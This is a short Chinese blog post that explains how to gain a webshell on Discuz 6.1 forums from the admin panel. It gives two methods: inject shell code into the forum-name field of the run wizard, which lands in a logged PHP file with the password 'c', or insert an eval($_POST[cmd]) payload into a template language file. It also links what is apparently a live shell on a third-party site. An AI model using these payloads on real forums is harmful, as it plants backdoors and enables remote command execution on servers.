天天看点

disucz 6.1后台拿webshell

<a href="http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt">http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt</a>

admincp.php?action=runwizard&amp;frames=yes点击下一步然后再论坛名称的地方插入webshell

后台webshell地址:bbs/forumdata/logs/runwizardlog.php

<a href="http://t00ls.yi.org/bbs/forumdata/logs/runwizardlog.php">http://t00ls.yi.org/bbs/forumdata/logs/runwizardlog.php</a>

密码c

方法2:后台模板管理--默认模板套系--详情

templates/default/actions.lang.php

jhackj//');eval($_POST[cmd])?&gt;;//

利用很简单,聪明的人一看就懂了

继续阅读